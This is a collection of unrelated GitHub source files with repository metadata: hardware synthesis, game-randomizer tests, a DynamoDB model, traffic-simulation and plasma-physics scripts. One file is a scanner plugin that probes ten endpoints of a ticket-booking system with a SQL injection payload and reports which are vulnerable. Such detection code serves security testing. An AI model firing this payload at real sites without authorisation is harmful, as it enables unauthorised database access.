def generate_csv_with_all_results(all_yosys_asic_synth_script, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
area_result_line = 'Chip area'
delay_result_line = 'Delay ='
csv_file_name = synthesis_output_folder + '/' + 'results.csv'
for each_yosys_synth_ecript in all_yosys_asic_synth_script:
with io.open(csv_file_name, "w", encoding="ascii", newline='') as csv_file:
line = '"Entity Name","Technology","Timing Constraint","Area","GE","Delay"\r\n'
csv_file.write(unicode(line, encoding="ascii"))
for each_std_cell in all_target_cells:
nand_size = 0.0
with open(each_std_cell['nand_file'], "r") as nand_file:
nand_size = float(nand_file.readline())
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
line = '"' + each_entity + '"' + ',' + '"' + each_std_cell['name'] + '"' + ',' + '"' + each_timing_constraint + '"' + ','
result_filename = synthesis_output_folder + '/' + each_yosys_synth_ecript[:-4] + '/' + each_std_cell['name'] + '/' + each_entity + '__t_' + each_timing_constraint + '.result'
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(area_result_line in result_line):
area_line_splitted = result_line.split(":")
area_result = (area_line_splitted[1]).strip()
line = line + '"' + area_result + '"' + ','
area_result_ge = str(int(math.ceil(float(area_result)/nand_size)))
line = line + '"' + area_result_ge + '"' + ','
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(delay_result_line in result_line):
delay_line_splitted = result_line.split(delay_result_line)
delay_result = ((delay_line_splitted[1]).split())[0]
line = line + '"' + delay_result + '"'
line = line + '\r\n'
csv_file.write(unicode(line, encoding="ascii"))
# STD cells descriptions
asic_cells_base_folder = '/home/pedro/asic_cells/'
gscl45nm_library = {
'name' : 'gscl45nm',
'liberty_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.lib',
'pin_constr_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.constr',
'nand_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.nand',
}
nangate1_library = {
'name' : 'NangateOpenCellLibrary_typical_ccs',
'liberty_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.lib',
'pin_constr_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.constr',
'nand_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.nand',
}
# Adding cells to the list
all_std_cells_libraries = []
all_std_cells_libraries += [gscl45nm_library]
all_std_cells_libraries += [nangate1_library]
yosys_location = 'yosys'
all_yosys_asic_synth_script = ['synth_asic.tcl']
all_yosys_simple_synth_script = ['synth_simple.tcl']
# All timing constraints
all_timing_constraints = []
all_timing_constraints += ['10000']
# All entity names
all_entity_names = []
all_entity_names += ['subterranean_round']
all_entity_names += ['subterranean_rounds_simple_1']
all_entity_names += ['subterranean_rounds_simple_2']
all_entity_names += ['subterranean_rounds_simple_4']
# Synthesis output folder
synthesis_output_folder = 'synth_out'
if __name__ == "__main__" :
if(len(sys.argv) == 1):
print('This is a basic synthesizes script')
print('')
print('You can try to synthesize an entity not named here by just writing the name directly')
print('synth.py entity_name')
print('')
print('You can also synthesize one of the entities already listed here by writing -l and their number')
print('synth.py -l 0 1 2')
print('')
print('If you want everyone to be synthesized you can also just run -all')
print('synth.py -all')
print('')
print('If you want to generate asic csv report use -g')
print('synth.py -g')
print('')
print('Here are all timings in the script')
for i in range(len(all_timing_constraints)):
print(all_timing_constraints[i])
print('')
print('Here are all entities already in the script')
for i in range(len(all_entity_names)):
print(str(i) + ' - ' + all_entity_names[i])
else:
if(sys.argv[1] == '-all'):
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, all_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-l'):
selected_entity_names = []
list_of_numbers = [str(i) for i in sys.argv[2:]]
list_of_numbers = " ".join(list_of_numbers)
for i in range(len(all_entity_names)):
if(str(i) in list_of_numbers):
selected_entity_names += [all_entity_names[i]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, selected_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, selected_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-g'):
generate_csv_with_all_results(all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
else:
new_entity_name = [sys.argv[2]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, new_entity_name, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, new_entity_name, synthesis_output_folder)
|
tintin10q/subterranean2digital
|
Reference_code/verilog_project/yosys_synth/synth.py
|
synth.py
|
py
| 11,689 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.isdir",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 67,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 71,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 176,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 202,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 204,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 211,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 214,
"usage_type": "attribute"
}
] |
10423167833
|
from __future__ import annotations
import dataclasses
from random import Random
from unittest.mock import MagicMock
import pytest
from randovania.game_description.game_patches import GamePatches
from randovania.game_description.resources.pickup_index import PickupIndex
from randovania.game_description.resources.resource_type import ResourceType
from randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters import (
PrimeTrilogyTeleporterConfiguration,
)
from randovania.games.prime2.generator.bootstrap import EchoesBootstrap
from randovania.games.prime2.generator.pickup_pool import sky_temple_keys
from randovania.games.prime2.layout.echoes_configuration import LayoutSkyTempleKeyMode
from randovania.generator.pickup_pool import pool_creator
_GUARDIAN_INDICES = [
PickupIndex(43), # Dark Suit
PickupIndex(79), # Dark Visor
PickupIndex(115), # Annihilator Beam
]
_SUB_GUARDIAN_INDICES = [
PickupIndex(38), # Morph Ball Bomb
PickupIndex(37), # Space Jump Boots
PickupIndex(75), # Boost Ball
PickupIndex(86), # Grapple Beam
PickupIndex(102), # Spider Ball
PickupIndex(88), # Main Power Bombs
]
@pytest.mark.parametrize("vanilla_teleporters", [False, True])
def test_misc_resources_for_configuration(
echoes_resource_database,
default_echoes_configuration,
vanilla_teleporters: bool,
):
# Setup
teleporters = MagicMock(spec=PrimeTrilogyTeleporterConfiguration)
configuration = dataclasses.replace(default_echoes_configuration, teleporters=teleporters)
teleporters.is_vanilla = vanilla_teleporters
gfmc_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGFMCGate")
torvus_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaTorvusTempleGate")
great_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGreatTempleEmeraldGate")
# Run
result = dict(
configuration.game.generator.bootstrap.misc_resources_for_configuration(
configuration,
echoes_resource_database,
)
)
relevant_tricks = {trick: result[trick] for trick in [gfmc_resource, torvus_resource, great_resource]}
# Assert
assert relevant_tricks == {
gfmc_resource: 0,
torvus_resource: 0,
great_resource: 0 if not vanilla_teleporters else 1,
}
@pytest.mark.parametrize("stk_mode", LayoutSkyTempleKeyMode)
def test_assign_pool_results(echoes_game_description, default_echoes_configuration, stk_mode: LayoutSkyTempleKeyMode):
patches = GamePatches.create_from_game(
echoes_game_description, 0, dataclasses.replace(default_echoes_configuration, sky_temple_keys=stk_mode)
)
pool_results = pool_creator.calculate_pool_results(patches.configuration, patches.game)
# Run
result = EchoesBootstrap().assign_pool_results(
Random(1000),
patches,
pool_results,
)
# Assert
shuffled_stks = [
pickup for pickup in pool_results.to_place if pickup.pickup_category == sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY
]
assert result.starting_equipment == pool_results.starting
if stk_mode == LayoutSkyTempleKeyMode.ALL_BOSSES:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES + _SUB_GUARDIAN_INDICES)
elif stk_mode == LayoutSkyTempleKeyMode.ALL_GUARDIANS:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES)
else:
assert len(shuffled_stks) == stk_mode.num_keys
|
randovania/randovania
|
test/games/prime2/generator/test_echoes_bootstrap.py
|
test_echoes_bootstrap.py
|
py
| 3,634 |
python
|
en
|
code
| 165 |
github-code
|
6
|
[
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "unittest.mock.MagicMock",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters.PrimeTrilogyTeleporterConfiguration",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "dataclasses.replace",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType.MISC",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "randovania.game_description.resources.resource_type.ResourceType",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "randovania.game_description.game_patches.GamePatches.create_from_game",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.game_patches.GamePatches",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "dataclasses.replace",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "randovania.generator.pickup_pool.pool_creator.calculate_pool_results",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "randovania.generator.pickup_pool.pool_creator",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.generator.bootstrap.EchoesBootstrap",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "random.Random",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "randovania.games.prime2.generator.pickup_pool.sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.generator.pickup_pool.sky_temple_keys",
"line_number": 82,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode.ALL_BOSSES",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode.ALL_GUARDIANS",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "randovania.games.prime2.layout.echoes_configuration.LayoutSkyTempleKeyMode",
"line_number": 66,
"usage_type": "argument"
},
{
"api_name": "pytest.mark",
"line_number": 66,
"usage_type": "attribute"
}
] |
74725395066
|
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute
from flask_blog.lib.utils import is_production
import os
class Entry(Model):
class Meta:
table_name = "serverless_blog_entries"
region = 'ap-northeast-1'
# 本番環境用の設定
if is_production():
aws_access_key_id = os.environ.get('SERVERLESS_AWS_ACCESS_KEY_ID')
aws_secret_access_key = os.environ.get('SERVERLESS_AWS_SECRET_KEY')
# 開発環境用の設定
else:
aws_access_key_id = 'AWS_ACEESS_KEY_ID'
aws_secret_access_key = 'AWS_SECRET_ACCESS_KEY'
host = "http://localhost:8000"
# カラムの定義
id = NumberAttribute(hash_key=True, null=False) # 数値
title = UnicodeAttribute(null=True) # 文字列
text = UnicodeAttribute(null=True) # 文字列
created_at = UTCDateTimeAttribute(default=datetime.now) # UTCベースの Datetime
|
uni51/serverless_python_tutorial
|
application/flask_blog/models/entries.py
|
entries.py
|
py
| 1,030 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pynamodb.models.Model",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "flask_blog.lib.utils.is_production",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "pynamodb.attributes.NumberAttribute",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UnicodeAttribute",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UnicodeAttribute",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pynamodb.attributes.UTCDateTimeAttribute",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime",
"line_number": 26,
"usage_type": "name"
}
] |
37430288968
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 票友机票预订系统10处SQL注入
referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
author: Lucifer
description: multi sqli。
'''
import sys
import requests
class piaoyou_ten_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Other/train_input.aspx?memberid=1",
"/Other/hotel_input.aspx?memberid=1",
"/Other/input.aspx?memberid=1",
"/flight/Print_url_sel.aspx?id=2",
"/flight/Xcd_selected.aspx?id=111",
"/System/history.aspx?id=1",
"/flight/scgq.aspx?id=1",
"/Other/Edit.aspx?id=1",
"/flight/Html.aspx?id=1",
"/info/zclist_new.aspx?id=1"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在票友机票预订系统10处SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/cms/piaoyou/piaoyou_ten_sqli.py
|
piaoyou_ten_sqli.py
|
py
| 1,575 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 44,
"usage_type": "attribute"
}
] |
8385237281
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from argparse import ArgumentParser
if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
def get_options(args=None):
parser = ArgumentParser(description="Sample routes to match counts")
parser.add_argument("-t", "--turn-file", dest="turnFile",
help="Input turn-count file")
parser.add_argument("-o", "--output-file", dest="out",
help="Output edgeRelations file")
parser.add_argument("--turn-attribute", dest="turnAttr", default="probability",
help="Write turning 'probability' to the given attribute")
options = parser.parse_args(args=args)
if options.turnFile is None or options.out is None:
parser.print_help()
sys.exit()
return options
def main(options):
with open(options.out, 'w') as outf:
sumolib.writeXMLHeader(outf, "$Id$", "data", "datamode_file.xsd") # noqa
for interval in sumolib.xml.parse(options.turnFile, 'interval'):
outf.write(' <interval begin="%s" end="%s">\n' % (
interval.begin, interval.end))
if interval.fromEdge:
for fromEdge in interval.fromEdge:
for toEdge in fromEdge.toEdge:
outf.write(' ' * 8 + '<edgeRelation from="%s" to="%s" %s="%s"/>\n' % (
fromEdge.id, toEdge.id, options.turnAttr, toEdge.probability))
outf.write(' </interval>\n')
outf.write('</edgeRelations>\n')
if __name__ == "__main__":
main(get_options())
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/turn-defs/turnFile2EdgeRelations.py
|
turnFile2EdgeRelations.py
|
py
| 1,716 |
python
|
en
|
code
| 17 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sumolib.writeXMLHeader",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "sumolib.xml.parse",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sumolib.xml",
"line_number": 32,
"usage_type": "attribute"
}
] |
26824633032
|
import matplotlib.pyplot as plt
import scipy
import scipy.interpolate
import sys
sys.path.append('/home/faustian/python/adas/xxdata_13/')
from matplotlib import rc
import adasread
rc('text', usetex=True)
rc('font',**{'family':'serif','serif':['Computer Modern Roman']})
#rc('font',**{'family':'sans-serif','sans-serif':['Computer Modern Sans serif']})
rc('font',size=18)
# GRAB Lyalpha ONLY
def plot(filein,Telim,Nelim):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
print(out[13])
print(out[12])
print(out[14])
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
zout = SXB[temp2,:]
zout = zout[:,temp]
plt.pcolor(xout,yout,zout)
plt.clim([.3,1.6])
plt.colorbar()
plt.xlabel(r'electron density [$10^{20} $m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
def plot2(filein,Telim,Nelim,pts=101):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
print(out[13].shape)
print(out[12].shape)
print(out[14].shape)
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
xout2,yout2 = scipy.meshgrid(ne[temp],Te[temp2])
SXB = SXB[temp2,:]
SXB = SXB[:,temp]
ne1 = scipy.linspace(ne[temp].min(),ne[temp].max(),pts)
Te1 = scipy.linspace(Te[temp2].min(),Te[temp2].max(),pts)
xout,yout = scipy.meshgrid(ne1,Te1)
interp = scipy.interpolate.RectBivariateSpline(scipy.log(ne[temp]),
Te[temp2],
SXB)
zout = interp.ev(scipy.log(xout),yout)
#xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
#zout = SXB[temp2,:]
#zout = zout[:,temp]
plt.pcolor(xout*1e6,yout,zout.T)
plt.colorbar()
plt.xlabel(r'electron density [$10^{20}$ m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
def plot3(filein,Telim,Nelim,pts=11):
plt.figure()
out = adasread.xxdata_13(filein,1,Telim,Nelim)
print(out[13].shape)
print(out[12].shape)
print(out[14].shape)
ne = scipy.array(out[13]).ravel()
Te = scipy.array(out[12]).ravel()
SXB = scipy.array(out[14][:,:,0])
temp = ne != 0
temp2 = Te != 0
SXB = SXB[temp2,:]
SXB = SXB[:,temp]
xout2,yout2 = scipy.meshgrid(ne[temp],Te[temp2])
print(Te[temp2])
ne1 = scipy.linspace(ne[temp].min(),ne[temp].max(),pts)
Te1 = scipy.linspace(Te[temp2].min(),Te[temp2].max(),pts)
xout,yout = scipy.meshgrid(ne1,Te1)
zout = scipy.interpolate.griddata((scipy.log(xout2.flatten()),yout2.flatten()),SXB.flatten(),(scipy.log(xout),yout),'cubic')
#xout,yout = scipy.meshgrid(ne[temp]*1e6,Te[temp2])
#zout = SXB[temp2,:]
#zout = zout[:,temp]
plt.imshow(zout,cmap='viridis',extent=[ne1[0]*1e6,ne1[-1]*1e6,Te1[0],Te1[-1]],aspect='auto',origin='lower')
#plt.clim([.3,1.8])
colorz = plt.colorbar()
colorz.set_label(r'S/XB [ionizations per Ly$_\alpha$ photon]')
plt.xlabel(r'electron density [m$^{-3}$]')
plt.ylabel(r'electron temperature [eV]')
#plt.title(filein+' colorbar is ionizations per photon')
|
icfaust/Misc
|
analyzeSXB.py
|
analyzeSXB.py
|
py
| 3,468 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rc",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pcolor",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.clim",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate.RectBivariateSpline",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "scipy.log",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "scipy.log",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pcolor",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "adasread.xxdata_13",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "scipy.array",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "scipy.linspace",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "scipy.meshgrid",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate.griddata",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "scipy.interpolate",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "scipy.log",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imshow",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 111,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.colorbar",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 114,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 117,
"usage_type": "name"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.